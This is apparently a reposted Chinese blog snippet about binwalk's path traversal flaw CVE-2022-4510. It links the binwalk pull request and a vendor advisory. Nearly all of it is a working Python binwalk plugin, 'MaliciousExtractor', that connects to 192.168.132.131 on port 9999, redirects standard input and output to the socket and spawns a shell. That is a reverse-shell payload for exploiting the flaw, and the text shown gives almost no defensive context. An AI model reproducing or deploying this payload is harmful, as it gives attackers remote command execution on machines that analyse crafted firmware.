https://github.com/ReFirmLabs/binwalk/pull/617
import binwalk.core.plugin
import socket,subprocess,os,pty
class MaliciousExtractor(binwalk.core.plugin.Plugin):
def init(self):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.132.131",9999))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("sh")
https://github.com/ReFirmLabs/binwalk/pull/617
https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk/
原文始发于微信公众号(陈冠男的游戏人生):binwalk路径穿越CVE-2022-4510
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论